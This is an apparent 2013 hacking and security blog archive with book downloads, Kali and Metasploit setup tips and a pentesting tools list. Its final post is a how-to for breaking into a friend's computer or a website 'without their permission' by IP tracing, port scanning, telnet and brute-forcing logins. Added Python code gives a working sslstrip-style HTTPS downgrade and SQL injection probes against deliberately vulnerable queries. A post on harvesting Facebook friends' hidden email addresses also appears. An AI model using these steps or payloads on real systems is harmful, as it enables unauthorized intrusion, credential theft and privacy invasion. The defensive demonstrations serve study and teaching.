Monday, 16 September 2013

Linux Malware Incident Response


Linux Malware Incident Response: A Practitioner's Guide to Forensic Collection and Examination of Volatile Data: An Excerpt from Malware Forensic Field Guide for Linux Systems

Book Details:
Pages: 134
Publisher: Syngress (March 2013)
Language: English
ISBN-10: 0124095070
ISBN-13: 978-0124095076
Format: PDF, EPUB

Book Description:
Linux Malware Incident Response is a first look at the Malware Forensics Field Guide for Linux Systems, exhibiting the first steps in investigating Linux-based incidents. The Syngress Digital Forensics Field Guides series includes companions for any digital and computer forensic investigator and analyst. Each book is a toolkit with checklists for specific tasks, case studies of difficult situations, and expert analyst tips. This compendium of tools for computer forensics analysts and investigators is presented in a succinct outline format with cross-references to supplemental appendices. It is designed to provide the digital investigator clear and concise guidance in an easily accessible format for responding to an incident or conducting analysis in a lab.

  • Presented in a succinct outline format with cross-references to included supplemental components and appendices
  • Covers volatile data collection methodology as well as non-volatile data collection from a live Linux system
  • Addresses malware artifact discovery and extraction from a live Linux system

Table of Contents
Chapter 1. Linux Malware Incident Response

Appendix A. Linux Field Guide Tool Box
Appendix B. Selected Readings
Appendix C. Interview Questions
Appendix D. Pitfalls to Avoid
Appendix E. Live Response Field Notes

Download : Linux Malware Incident Response

Sunday, 8 September 2013

Practical VoIP Security


Voice Over IP (VoIP) phone lines now represent over 50% of all new phone line installations. Every one of these new VoIP phone lines and handsets must now be protected from malicious hackers, because these devices now reside on the network and are accessible from the Internet just like any server or workstation.

This book covers a wide variety of the publicly available exploit tools and how they can be used specifically against VoIP telephony systems. It covers the attack methodologies used against the SIP and H.323 protocols as well as against VoIP network infrastructure. Significant emphasis is placed on both attack and defense techniques. The book is designed to be very hands-on and scenario intensive.

  • More VoIP phone lines are being installed every day than traditional PBX phone lines
  • VoIP is vulnerable to the same range of attacks as any network device
  • VoIP phones can receive as many spam voice mails as your e-mail can receive spam e-mails, and as a result must have the same types of anti-spam capabilities

Contents
1. Introduction
2. Architectures
3. Hardware
4. Protocols
5. Support Protocols
6. Protocol Security
7. Threats
8. Solutions Overview
9. Reuse Existing Security Infrastructure Wisely
10. Confirm User Identity
11. Active Security Monitoring
12. Logical Segregation
13. Encryption
14. A Note on Regulatory Compliance
15. Recommendations
16. Appendix

A: Access List Guidelines

Thomas Porter, Jan Kanclirz Jr., “Practical VoIP Security”
2006 | pages: 592 | ISBN: 1597490601 | PDF | 9.7 MB

Download : Practical VoIP Security

Saturday, 7 September 2013

Fix msfupdate Problem


Error : Could not find pg-0.15.0 in any of the sources. Run `bundle install` to install missing gems

I got this error because, while I was running the msfupdate command, it showed me an error in the pg-0.15.1 package installation.

Solution
  • Go to this path (for 64-bit BackTrack 5 R3): root@bt: cd /opt/metasploit/ruby/lib/ruby/1.9.1/x86_64-linux/
  • Edit the file rbconfig.rb
  • Search for this line: CONFIG["LIBRUBYARG_STATIC"] = "-Wl,-R -Wl,$(libdir) -L$(libdir) -l$(RUBY_SO_NAME)-static" and remove -l$(RUBY_SO_NAME)-static
  • Save the file and run msfupdate again
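The same edit, done as an added Python helper (this is not from the original post and not part of Metasploit or BackTrack): it locates the LIBRUBYARG_STATIC line, touches nothing else, keeps a .bak copy of the original and reports whether it patched the file, found it already clean, or found no such line at all. The default path and the file layout it is tested against are assumptions; pass your own rbconfig.rb path as the first argument.

```python
import re
import shutil
from pathlib import Path

# Token the post says to remove from rbconfig.rb (hypothetical helper, not Metasploit code)
STATIC_TOKEN = "-l$(RUBY_SO_NAME)-static"
LINE_RE = re.compile(r'^(\s*CONFIG\["LIBRUBYARG_STATIC"\]\s*=\s*")([^"]*)(".*)$')


def strip_static_link_flag(rbconfig_path):
    """Remove -l$(RUBY_SO_NAME)-static from the LIBRUBYARG_STATIC line of an rbconfig.rb.

    Returns "patched", "already-patched" or "line-not-found". The file is only rewritten
    on "patched", and a <name>.bak copy of the original is saved first so the edit can be
    undone if bundler then complains about something else.
    """
    path = Path(rbconfig_path)
    lines = path.read_text().splitlines(keepends=True)
    for idx, line in enumerate(lines):
        match = LINE_RE.match(line.rstrip("\r\n"))
        if not match:
            continue
        prefix, flags, suffix = match.groups()
        tokens = flags.split()
        if STATIC_TOKEN not in tokens:
            return "already-patched"
        tokens = [t for t in tokens if t != STATIC_TOKEN]
        lines[idx] = prefix + " ".join(tokens) + suffix + "\n"
        shutil.copy2(path, path.with_name(path.name + ".bak"))
        path.write_text("".join(lines))
        return "patched"
    return "line-not-found"


def libruby_static_flags(rbconfig_path):
    """Return the current LIBRUBYARG_STATIC value, or None if the line is missing (for checking)."""
    for line in Path(rbconfig_path).read_text().splitlines():
        match = LINE_RE.match(line)
        if match:
            return match.group(2)
    return None


if __name__ == "__main__":
    import sys
    # Assumed default: the BackTrack 5 R3 64-bit path named in the post
    target = sys.argv[1] if len(sys.argv) > 1 else \
        "/opt/metasploit/ruby/lib/ruby/1.9.1/x86_64-linux/rbconfig.rb"
    print(strip_static_link_flag(target))
    print("LIBRUBYARG_STATIC is now:", libruby_static_flags(target))
```

Run it as root (the file is owned by root under /opt/metasploit), then rerun msfupdate; if it reports line-not-found, your Metasploit ships a different Ruby layout and this particular fix does not apply.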

Video :



Friday, 30 August 2013

MASTERING WINDOWS NETWORK FORENSICS AND INVESTIGATION, 2ND EDITION


An authoritative guide to investigating high-technology crimes. Internet crime is seemingly ever on the rise, making the need for a comprehensive resource on how to investigate these crimes even more dire. This professional-level book, aimed at law enforcement personnel, prosecutors, and corporate investigators, provides you with the training you need in order to acquire the sophisticated skills and software solutions to stay one step ahead of computer criminals.


  • Specifies the techniques needed to investigate, analyze, and document a criminal act on a Windows computer or network
  • Places a special emphasis on how to thoroughly investigate criminal activity and not just perform the initial response
  • Walks you through ways to present technically complicated material in simple terms that will hold up in court
  • Features content fully updated for Windows Server 2008 R2 and Windows 7
  • Covers the emerging field of Windows Mobile forensics

Also included is a classroom support package to ensure academic adoption. Mastering Windows Network Forensics and Investigation, 2nd Edition offers help for investigating high-technology crimes.

About the Author
Steve Anson, CISSP, EnCE, is the cofounder of Forward Discovery. He has previously served as a police officer, FBI High Tech Crimes Task Force agent, Special Agent with the U.S. DoD, and an instructor with the U.S. State Department Antiterrorism Assistance Program (ATA). He has trained hundreds of law enforcement officers around the world in techniques of digital forensics and investigation. Steve Bunting, EnCE, CCFT, has over 35 years of experience in law enforcement, and his background in computer forensics is extensive. He has conducted computer forensic examinations for numerous local, state, and federal agencies on a variety of cases, as well as testified in court as a computer forensics expert. He has taught computer forensics courses for Guidance Software and is currently a Senior Forensic Consultant with Forward Discovery. Ryan Johnson, DFCP, CFCE, EnCE, SCERS, is a Senior Forensic Consultant with Forward Discovery. He was a digital forensics examiner for the Durham, NC, police and a Media Exploitation Analyst with the U.S. Army. He is an instructor and developer with the ATA. Scott Pearson has trained law enforcement entities, military personnel, and network/system administrators in more than 20 countries for the ATA. He is also a certifying Instructor on the Cellebrite UFED Logical and Physical Analyzer Mobile Device Forensics tool and has served as an instructor for the DoD Computer Investigations Training Academy.

Product Details
Paperback: 696 pages
Publisher: Sybex; 2 edition (June 26, 2012)
Language: English
ISBN-10: 1118163826
ISBN-13: 978-1118163825

Download Link : MASTERING WINDOWS NETWORK FORENSICS AND INVESTIGATION, 2ND EDITION

Tuesday, 27 August 2013

Configure xssf Metasploit Plugin in Kali Linux


The Cross-Site Scripting Framework (XSSF) is a security tool designed to turn the XSS vulnerability exploitation task into a much easier job. XSSF creates a communication channel with the targeted browser (through an XSS vulnerability) in order to perform further attacks. Users are free to select existing modules (a module = an attack) to target specific browsers. XSSF provides a powerful, documented API that facilitates development of modules and attacks. In addition, its integration into the Metasploit Framework lets users launch MSF browser-based exploits easily from an XSS vulnerability.

How to Configure :

1 - Open a Kali Linux terminal and type cd /opt/metasploit/apps/pro/msf3

2 - In msf3, install XSSF using the following command:

svn export http://xssf.googlecode.com/svn/trunk ./ --force

3 - Start msfconsole and load the XSSF plugin with the command: load xssf

VIDEO : 


Wednesday, 10 July 2013

How to Hack a Computer with Armitage


Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.

Through one Metasploit instance, your team will:
  •     Use the same sessions
  •     Share hosts, captured data, and downloaded files
  •     Communicate through a shared event log.
  •     Run bots to automate red team tasks

VIDEO : 

Monday, 8 July 2013

How to fix Memory Card formatting problem ?


The solution is to format the memory card again with the FAT file system from a computer, because your phone can no longer read it and so cannot format it itself.

To format your memory card with the FAT (FAT16) file system:
  • Plug your memory card into your computer.
  • Wait until the computer detects the memory card.
  • Note down the drive letter of your memory card.
Note: In this tutorial we assume the drive letter of your memory card is I:, but you must replace it with the actual drive letter of your card.

  • Now open a Command Prompt: press WinKey+R, type CMD and hit Enter (or use Start > Run). Windows 7 and Vista users should type CMD in the Start menu's search box, right-click the Command Prompt entry and choose Run as administrator.
  • Once the Command Prompt opens, type format I: /fs:FAT and hit Enter.
Please note that this tutorial assumes I: is the drive letter of the memory card; double-check it, because format erases every file on whichever drive you name. Windows also refuses to create a FAT16 volume larger than 4 GB, so for a bigger card use /fs:FAT32 instead.

Sunday, 7 July 2013

How to install Tor browser in Kali Linux

Tor (The Onion Router) is free software for enabling online anonymity. Tor directs Internet traffic through a free, worldwide volunteer network consisting of more than three thousand relays.

Click Here to Download Tor Browser


How to install :

VIDEO :

Saturday, 6 July 2013

How to run Google Chrome as Root in Kali Linux






Steps :

  • cd Desktop
  • dpkg -i <chrome .deb file name>
  • Open the menu editor (Launch Application) and create a new element
  • Name: Google
  • Command: google-chrome
  • Open /opt/google/chrome/google-chrome with leafpad and change the last line
    exec -a "$0" "$HERE/chrome" "$@"
    to
    exec -a "$0" "$HERE/chrome" "$@" --user-data-dir

VIDEO :

Friday, 5 July 2013

GUI Sqlmap in Kali Linux






Installation Commands :
  • sudo apt-get install python-tk python2.7 sakura
  • git clone git://github.com/sqlmapproject/sqlmap.git
  • cd sqlmap
  • Download the GUI (sqm-60712.zip) from http://gui-for-sqlmap.googlecode.com into the sqlmap directory
  • unzip sqm-60712.zip
  • python2.7 sqm.pyw
VIDEO :


Finding out GeoLocation of IP Address using NMAP


Tries to identify the physical location of an IP address using the Geobytes geolocation web service.

Download Script

Usage


nmap --script ip-geolocation-geobytes <target>

Output

| ip-geolocation-geobytes:
| latitude: 43.667
| longitude: -79.417
| city: Toronto
| region: Ontario
|_ country: Canada
 

VIDEO :

Tuesday, 2 July 2013

SSLsplit v 0.4.5 - Man-in-the-middle attacks against SSL/TLS


Note: the description below is actually of sslstrip, the HTTPS-stripping tool Moxie Marlinspike presented at Black Hat DC 2009. SSLsplit, whose 0.4.5 changelog follows, is a separate tool by Daniel Roethlisberger that terminates TLS itself with forged certificates instead of downgrading connections to plain HTTP.

A new tool presented at the Black Hat DC 2009 conference by Moxie Marlinspike proves to be a formidable foe against secure login schemes. Always trying to stay on top of the game, Click Death Squad decides to give this tool a whirl and see what the buzz is all about. This attack is particularly crafty because it acts as a man in the middle, watching for HTTPS requests and then mapping them to look-alike HTTP versions. If a person were operating on a wireless access point that had been broken into, the results can be devastating. You have a box running sslstrip which has port forwarding enabled and is actively spoofing ARP on the LAN. This computer is the jump-off point: it fakes out the wireless router into sending the victim's HTTPS requests through it, modifies them and passes them on to the victim. Features include a fake "lock" icon and selective logging capabilities, which provide great flexibility when sniffing traffic. The example shows how a MySpace "secure" login can be easily captured using this attack. Props to Moxie Marlinspike for making this tool available to the public.
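To make the mechanism concrete, here is an added Python sketch (not sslstrip's or SSLsplit's code) of the two halves that matter: the rewrite sslstrip performs on a plaintext response passing through the MITM box, and the HSTS check that decides whether a browser would fall for the downgraded link. The HTML snippet, header values and hostnames are constructed examples.

```python
import re

# Matches absolute https:// URLs in an HTML/HTTP body (constructed example, not sslstrip's code)
HTTPS_LINK = re.compile(rb"https://([A-Za-z0-9.-]+)")


def strip_https_links(body):
    """sslstrip-style rewrite of a plaintext HTTP response flowing through the MITM box.

    Every https:// link the server sent is rewritten to http://, so the victim's next
    request arrives at the attacker in the clear while the attacker keeps talking HTTPS to
    the real site. Returns the rewritten body and the set of hosts that were downgraded.
    """
    downgraded = set()

    def swap(match):
        downgraded.add(match.group(1).decode("ascii"))
        return b"http://" + match.group(1)

    return HTTPS_LINK.sub(swap, body), downgraded


def parse_hsts(headers):
    """Parse a Strict-Transport-Security header from a list of (name, value) pairs.

    Returns (max_age_seconds, include_subdomains), or None when absent or malformed
    (max-age is mandatory per RFC 6797).
    """
    value = None
    for name, val in headers:
        if name.lower() == "strict-transport-security":
            value = val  # a later header overrides an earlier one
    if value is None:
        return None
    max_age, include_sub = None, False
    for directive in value.split(";"):
        directive = directive.strip()
        if directive.lower().startswith("max-age="):
            try:
                max_age = int(directive.split("=", 1)[1].strip().strip('"'))
            except ValueError:
                return None
        elif directive.lower() == "includesubdomains":
            include_sub = True
    if max_age is None:
        return None
    return max_age, include_sub


def strip_would_succeed(host, hsts_cache):
    """Decide whether a downgraded http://host link can still be stripped.

    hsts_cache maps hostnames to (max_age, include_subdomains) the browser has already
    stored. A browser that knows the host (or a parent domain with includeSubDomains)
    rewrites http:// back to https:// before sending, so the MITM never sees plaintext.
    A first visit with no cached entry is still exposed; the preload list closes that gap.
    """
    labels = host.lower().split(".")
    for i in range(len(labels)):
        entry = hsts_cache.get(".".join(labels[i:]))
        if entry and entry[0] > 0 and (i == 0 or entry[1]):
            return False
    return True
```

The defence this illustrates is the one that made sslstrip largely obsolete: a site that sends Strict-Transport-Security (ideally with includeSubDomains and a preload entry) never gives the stripped link a chance to be followed in plaintext.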

Changes in SSLsplit 0.4.5:
    Add support for 2048 and 4096 bit Diffie-Hellman
    Fix syslog error messages
    Fix threading issues in daemon mode
    Fix address family check in netfilter NAT lookup
    Fix build on recent glibc systems
    Minor code and build process improvements

Download SSLsplit v 0.4.5

VIDEO :

Thursday, 20 June 2013

How to Use Whatsapp on PC for Windows and Mac




Unfortunately, if you don't own a smartphone you might not be able to use WhatsApp. But don't worry: today we will learn how to use WhatsApp on a PC as well.
You can use it on both Windows and Mac.

To run WhatsApp on a PC we need an Android emulator, which lets us run WhatsApp on the PC.

Step 1: YouWave and BlueStacks are the two Android emulators that enable us to run WhatsApp or any other Android app on a PC.

Step 2: If you go for BlueStacks, download and install it, then run BlueStacks and click on "Apps". Then click on the "Social" tab, select "WhatsApp" and install it.


Step 3: If you go for YouWave, which I am using on my PC, just download and install it. Now download whatsapp.apk and move the downloaded file to the YouWave PC directory.

To find the PC directory, open YouWave and click Help > Instruction. Move your whatsapp.apk file into that directory, then click View > Redraw Icons.

Now you will see the WhatsApp icon.

After installing WhatsApp on YouWave or BlueStacks you have to enter a mobile number that has not been used for a WhatsApp account before. They will take about 5 minutes to verify it and will send you a code.
Enter that code and that's all.

How to Get Email ids of your all Facebook Friends



How to Get Email ids of your all Facebook Friends :


If you want to know the email ids of your Facebook friends that are hidden and not shown on their Facebook profiles, here is the trick through which you can get the email addresses of all your Facebook friends. Just follow the simple steps given below:

Step 1 – If your Facebook account is not connected with a Yahoo id, first create an email id on Yahoo and connect your Facebook account with that Yahoo email id.

Step 2 – Now log in to Yahoo Mail and go to the Contacts tab.

Step 3 – Click on Import Contacts.

Step 4 – Now click on Facebook.

Step 5 – In the pop-up you will get a message asking whether you want to share your contacts with Yahoo! Click on OK.

Step 6 – Now you will get a confirmation message.

Step 7 – That's it! Click on View imported contacts and see your Facebook friends' email ids.

How to install OpenShot 1.4.3 in Ubuntu


Install OpenShot 1.4.3 in Ubuntu

Popular Linux video editor, OpenShot, has just been updated to version 1.4.3 and this brief tutorial is going to show you how to install or upgrade to it in Ubuntu 12.04 (Precise Pangolin).

This release brings many changes as well as new features including, a new dark theme, 3D animations and effects, and others.

For a more detailed changelog, please click here.

To get started, press Ctrl – Alt – T on your keyboard to open the terminal. When it opens, run the commands below to add its PPA.

sudo add-apt-repository ppa:openshot.developers/ppa


sudo apt-get update


sudo apt-get install openshot frei0r-plugins



VIDEO :

Add Open As Administrator to the Context Menu in Ubuntu


Add Open As Administrator to the Context Menu in Ubuntu :

When this feature is enabled, you should be able to right-click any file or folder in nautilus and open it as an administrator or root. This will come in handy especially for new users who want to edit or modify files or folders owned by the root user or administrator.

To get started, press Ctrl – Alt – T on your keyboard to open Terminal. When it opens, run the commands below to download it.


  • wget http://www.liberiangeek.net/blog/tools/libnautilus-gksu.so




Next, copy the file to the nautilus extensions folder shown below


  • sudo cp libnautilus-gksu.so /usr/lib/nautilus/extensions-3.0/




Restart your computer (or just nautilus) and enjoy!

Note that this installs a prebuilt binary downloaded from a third-party blog into a directory nautilus loads from on every start, and the extension's whole purpose is to launch gksu as root; check the file's origin before copying it.

VIDEO :

Wednesday, 19 June 2013

DroidSQLi : First automated MySQL Injection tool for Android




DroidSQLi is the first automated MySQL Injection tool for Android. It allows you to test your MySQL-based web application against SQL injection attacks.

DroidSQLi supports the following injection techniques:
- Time based injection
- Blind injection
- Error based injection
- Normal injection

Click here to Download
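The four techniques listed above, as an added, runnable Python demonstration (not DroidSQLi's code): a deliberately vulnerable lookup next to its parameterised fix, with one probe per technique run against each. SQLite stands in for MySQL, so the time-based probe uses a CPU-heavy recursive query where a MySQL payload would use SLEEP(); the table, rows and payload strings are constructed.

```python
import sqlite3
import time


def build_db():
    """Constructed stand-in for the MySQL-backed app under test (SQLite, in memory)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw TEXT)")
    db.executemany("INSERT INTO users (name, pw) VALUES (?, ?)",
                   [("alice", "s3cret"), ("bob", "hunter2")])
    return db


def lookup_vulnerable(db, user_id):
    """Deliberately vulnerable: user input is concatenated into the statement."""
    sql = "SELECT name FROM users WHERE id = " + user_id
    return [row[0] for row in db.execute(sql)]


def lookup_safe(db, user_id):
    """Hardened form: a bound parameter is data and is never parsed as SQL."""
    return [row[0] for row in db.execute("SELECT name FROM users WHERE id = ?", (user_id,))]


def probe_normal(lookup):
    """Normal (in-band UNION) injection: attacker-chosen rows appear in the response."""
    return set(lookup("1 UNION SELECT pw FROM users"))


def probe_error_based(lookup):
    """Error-based: a stray quote breaks the statement; a leaked DB error message confirms it."""
    try:
        lookup("1'")
    except sqlite3.OperationalError as err:
        return str(err)
    return None


def probe_blind(lookup):
    """Boolean-based blind: nothing leaks but the difference between a true and a false page."""
    return lookup("1 AND 1=1") != lookup("1 AND 1=2")


# SQLite has no SLEEP(); this recursive CTE burns CPU the way SLEEP(5) burns wall time in MySQL.
SLOW_CONDITION = ("(WITH RECURSIVE c(x) AS (SELECT 1 UNION ALL SELECT x + 1 FROM c LIMIT 300000)"
                  " SELECT count(*) FROM c) > 0")


def probe_time_based(lookup):
    """Time-based blind: both pages look identical; only the delay shows the condition ran.

    Returns (rows, delay_seconds) so the caller can compare against a baseline request.
    """
    started = time.perf_counter()
    rows = lookup("1 AND " + SLOW_CONDITION)
    return rows, time.perf_counter() - started


def run_all(lookup):
    """Summarise which of the four techniques succeed against a lookup function."""
    _, delay = probe_time_based(lookup)
    return {
        "normal": "s3cret" in probe_normal(lookup),
        "error": probe_error_based(lookup) is not None,
        "blind": probe_blind(lookup),
        "time": delay > 0.02,  # threshold chosen for the constructed 300k-row CTE above
    }


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", run_all(lambda v: lookup_vulnerable(db, v)))
    print("safe:      ", run_all(lambda v: lookup_safe(db, v)))
```

Against lookup_safe every probe comes back negative: the quote never reaches the parser, the UNION is just a string compared to an integer, and the boolean and timing payloads produce the same empty result, which is exactly why parameterised queries, not input filtering, are the fix.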

Top 15 Hacking , Cracking , Pentesting Tools


Top 15 Hacking , Cracking , Pentesting Tools


1. PWN STAR

A bash script to launch an access point that can be configured with a variety of attack options, including a PHP script and a server index.html for phishing. It can act as a multi-client captive portal using PHP and iptables, and bundles exploitation classics such as a malicious (crime) PDF, de-auth with aireplay, etc.



General Features:


  • Managing Interfaces and MAC Spoofing

  • Set sniffing

  • Phishing Web

  • Karmetasploit

  • WPA handshake

  • De-auth client

  • Managing Iptables







2. ZED ATTACK PROXY (ZAP)

ZAP is an integrated penetration testing tool for finding vulnerabilities in web applications. It is designed for use by people with a wide range of security experience, and as such is ideal for developers and functional testers who are new to penetration testing, as well as being a useful addition to an experienced pentester's toolbox.


Key Features:

 



  • Intercepting Proxy

  • Active scanners

  • Passive scanners

  • Brute Force scanner

  • Spider

  • Fuzzer

  • Port Scanner

  • Dynamic SSL certificates

  • API

  • Beanshell integration


ZAP Download Here:




3. SET (SOCIAL ENGINEERING TOOLKIT)

A tool that focuses on attacking the human element: the weaknesses and carelessness of users. This tool is widely used today and is one of the most successful tools demonstrated at DEF CON.


Key Features:




  • Spear-Phishing Attack Vector

  • Java Applet Attack Vector

  • Metasploit Browser Exploit Method

  • Credential Harvester Attack Method

  • Tabnabbing Attack Method

  • Man Left in the Middle Attack Method

  • Web Jacking Attack Method

  • Multi-Attack Web Vector

  • Infectious Media Generator

  • Teensy USB HID Attack Vector



4. BURP SUITE

Burp Suite is a very nice tool for web application security testing, great for pentesters and security researchers. It contains a variety of tools with many interfaces between them, designed to facilitate and accelerate the process of attacking web applications.



General Function:




  • Intercepting proxy

  • Spider (crawler)

  • Web application scanner

  • Intruder (attack tool)

  • Repeater and Sequencer tools




5. ETTERCAP


Ettercap is a multipurpose sniffer / interceptor / logger for local area networks. It supports active and passive dissection of many protocols (even encrypted ones) and includes many features for network and host analysis.



General Function:




  • To capture traffic and data

  • To do logging network

  • Etc.



6. SANS INVESTIGATIVE FORENSIC TOOLKIT (SIFT)

The SANS Investigative Forensic Toolkit (SIFT) Workstation is a VMware appliance that can be configured with everything required to perform a detailed digital forensic examination. It is compatible with Expert Witness Format (E01), Advanced Forensic Format (AFF), and raw (dd) evidence formats. The new version has been completely rebuilt on an Ubuntu base with many additional tools and capabilities used in modern forensic practice.





General Function SIFT:




  • iPhone, Blackberry, and Android Forensic Capabilities

  • Registry Viewer (YARU)

  • Compatibility with F-Response Tactical, Standard, and Enterprise

  • PTK 2.0 (Special Release - Not Available for Download)

  • Automated Generation Timeline via log2timeline

  • Many Firefox Investigative Tools

  • Windows Journal Parser and Shellbags Parser (jp and sbag)

  • Many Windows Analysis Utilities (prefetch, usbstor, event logs, and more)

  • Complete Overhaul of Regripper Plugins (added over 80 additional plugins)






7. WIRESHARK

Wireshark is the world's most widely used and most popular network protocol analyzer, and is the de facto standard across many industries and educational institutions for analyzing network traffic in many different protocols.



General Function:




  • Live capture and offline analysis

  • Standard three-pane packet browser

  • Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others

  • Captured data network can be browsed via a GUI, or via the TTY-mode tshark utility

  • The most powerful display filters in the industry

  • Rich VoIP analysis

  • Read / write many different capture file formats

  • Etc.




8. WEBSPLOIT

WebSploit is an open source project for remotely scanning and analyzing weaknesses in web applications.



Key Features: 


[>] Social Engineering Works
[>] Scan, Web Crawler & Analysis
[>] Automatic Exploiter
[>] Support Network Attacks
-
[+] Autopwn - Used From Metasploit For Scan and Exploit Target Service
[+] WMAP - Scan and crawl the target using the Metasploit WMAP plugin
[+] Format Infector - inject a reverse or bind payload into a file format
[+] phpMyAdmin Scanner
[+] LFI Bypasser
[+] Apache Users Scanner
[+] Dir Bruter
[+] Admin Finder
[+] MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
[+] MITM - Man In The Middle Attack
[+] Java Applet Attack
[+] MFOD Attack Vector
[+] USB Infection Attack
[+] ARP DoS Attack
[+] Web Killer Attack
[+] Fake Update Attack
[+] Fake Access Point Attack





9. WINAUTOPWN


WinAutoPWN is a tool for exploiting Windows hosts directly, so that you automatically become an administrator on the target Windows machine. It is widely used by Indonesian "defacers" to deface Windows servers.






10. HASHCAT

Hashcat is a family of password-cracking tools that recover passwords from their hashes; it is very powerful for password recovery.





General Function:



  • Multi-Threaded

  • Free

  • Multi-Hash (up to 24 million hashes)

  • Multi-OS (Linux, Windows and OSX native binaries)

  • Multi-Algo (MD4, MD5, SHA1, DCC, NTLM, MySQL, ...)

  • SSE2 accelerated

  • All Attack-Modes except Brute-Force and Permutation can be extended by rules

  • Very fast Rule-engine

  • Rules compatible with JTR and PasswordsPro

  • Possible to resume or limit session

  • Automatically recognizes recovered hashes from outfile at startup

  • Can automatically generate random rules

  • Load saltlist from an external file and then use them in a Brute-Force Attack variant

  • Able to work in an distributed environment

  • Specify multiple wordlists or multiple directories of wordlists

  • Number of threads can be configured

  • Threads run at the lowest priority

  • 30 + Algorithms is implemented with performance in mind

  • ... and much more






11. UNISCAN

Uniscan is a web application vulnerability scanner, written in Perl for Linux. The current Uniscan version is 6.2.



General Function:


 



  • Identification of system pages through a Web Crawler.

  • Use of threads in the crawler.

  • Control of the maximum number of crawler requests.

  • Control of variation of system pages identified by Web Crawler.

  • Control of file extensions that are ignored.

  • Test of pages found via the GET method.

  • Test the forms found via the POST method.

  • Support for SSL requests ( HTTPS ).

  • Proxy support.

  • Generate site list using Google.

  • Generate site list using Bing.

  • Plug-in support for Crawler.

  • Plug-in support for dynamic tests.

  • Plug-in support for static tests.

  • Plug-in support for stress tests.

  • Multi-language support.

  • Web client.







12. OLLYDBG

OllyDbg is a 32-bit assembler-level debugger for Microsoft Windows. Its emphasis on binary code analysis makes it particularly useful in cases where source code is not available.



General Function:




  • Intuitive user interface, no cryptical commands

  • Code analysis - traces registers, recognizes procedures, loops, API calls, switches, tables, constants and strings

  • Directly loads and debugs DLLs

  • Object file scanning - locates routines from object files and libraries

  • Allows for user-defined labels, comments and function descriptions

  • Understands debugging information in Borland ® format

  • Saves patches between sessions, writes them back to executable file and updates fixups

  • Open architecture - many third-party plugins are available

  • No installation - no trash in registry or system directories

  • Debugs multithreaded applications

  • Attaches to running programs

  • Configurable disassembler, supports both MASM and IDEAL formats

  • MMX, 3DNow! and SSE instructions and the data types, Including Athlon extensions

  • Full UNICODE support

  • Dynamically recognizes ASCII and UNICODE strings - also in Delphi format!

  • Recognizes complex code constructs, like call to jump to procedure

  • Decodes calls to more than 1900 standard API and 400 C functions

  • Gives context-sensitive help on API functions from external help file

  • Sets conditional, logging, memory and hardware breakpoints

  • Traces program execution, logs arguments of known functions

  • Shows fixups

  • Dynamically traces stack frames

  • Searches for imprecise commands and masked binary sequences

  • Searches whole allocated memory

  • Finds references to constant or address range

  • Examines and modifies memory , sets breakpoints and Pauses program on-the-fly

  • Assembles commands into the shortest binary form

  • Starts from the floppy disk





13. BBQSQL

 

BBQSQL is an open source SQL injection framework specifically designed to be hyper fast, database agnostic, easy to set up, and easy to modify. It is another release from the Black Hat USA 2012 Arsenal. When conducting security assessments of applications we often find SQL injection vulnerabilities that are difficult to exploit; with this tool it becomes much easier.

BBQSQL is written in Python. It is very useful when attacking complex SQL injection vulnerabilities. BBQSQL is also a semi-automated tool, which allows quite a bit of customization for those who are finding it difficult to trigger a SQL injection. The tool is built to be database agnostic and very versatile. It also has an intuitive UI that makes setting up the attack much easier.



General Function:




  • SQL Injection Tools

  • URL

  • HTTP Method

  • Headers

  • Cookies

  • Encoding methods

  • Redirect behavior

  • Files

  • HTTP Auth

  • Proxies




14. CRYPTOHAZE

A password/hash cracking tool; Cryptohaze supports CUDA, OpenCL, and CPU code (SSE, AVX, etc.), and runs on any OS that supports CUDA. It is intended to make hash cracking easier for pentesters.



General Function:




  • Crack various kinds of hash

  • Showing results from crackhash

  • Cracking on various OS platforms





15. SAMURAI WEB TESTING FRAMEWORK (SWTF)
SWTF is used for testing / pentesting web applications: it is used to find weaknesses and to exploit them. Very comprehensive and widely used around the world, including by the binushacker staff.



General Function:



  • Web Scanner

  • Web Mapping

  • Web Exploitation


 

Hack remote computer via IP and open ports





Hack remote computer :


hacking is accessing something or somebody in internet without their permission or interest. While, speaking in summary, hacking is very easy job, it is like instead of using front door, finding the hidden door of a house and hijacking the precious things. Among all the hacking, hacking via IP address is one of the most common yet powerful beginning.



You may want to hack the website and put your advertisement there or grab some database information In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer. Because, www.website.com is hosted in separate web server rather than personal computer.


Another can be accessing your friend’s computer from your home. Again this is IP based and this is possible only when your friend’s computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.

Well, both of the hacking has the same process. Let’s summarize what we must do.



1. Confirm the website or a computer you want to hack.
2. Find or trace their IP address.
3. Make sure that IP address is online
4. Scan for open ports
5. Check for venerable ports

6. Access through the port
7. Brute-force username and password

Now let me describe in brief in merely basic steps that a child can understand it.
First, getting the IP address of victim.
To get the IP address of the victim website, ping for it in command prompt.

For example,
ping www.google.com



will fetch the IP address of Google.com


This is how we can get the IP address of the victims website.

How about your friend’s PC? You can’t do www.yourfirend’sname.com, can you? Finding your friend’s IP address is little tough job, and tougher it is if he has dynamic IP address that keeps changing.

One of the widely used method to detect IP address of your friend is by chatting with him.

You might find this article helpful

How to get the IP address using MSN/Yahoo/Pidgin messenger


Now you've got the IP address, right? Is it online?

To know the online status, just ping the IP address; if it is online it will reply.


If the IP address is online, scan for the open ports. Open ports are like closed doors without locks: you can go in and out easily.


Use Advanced Port Scanner to scan for all open and vulnerable ports.



Now that you have the victim's IP address and an open port, you can use telnet to try to access it. Make sure that you have telnet enabled on your computer, or install it from Control Panel > Add/Remove Programs > Add Windows Components.

Now open the command prompt and use the telnet command to connect to the IP address. Use the following syntax for the connection.


telnet [IP address] [Port]



You’ll be asked to input login information.


If you can guess the information easily, then it's OK. Otherwise you can use some brute-forcing tools like these: Brutus, THC Hydra.
In this way you'll be able to hack a remote computer using only its IP address.
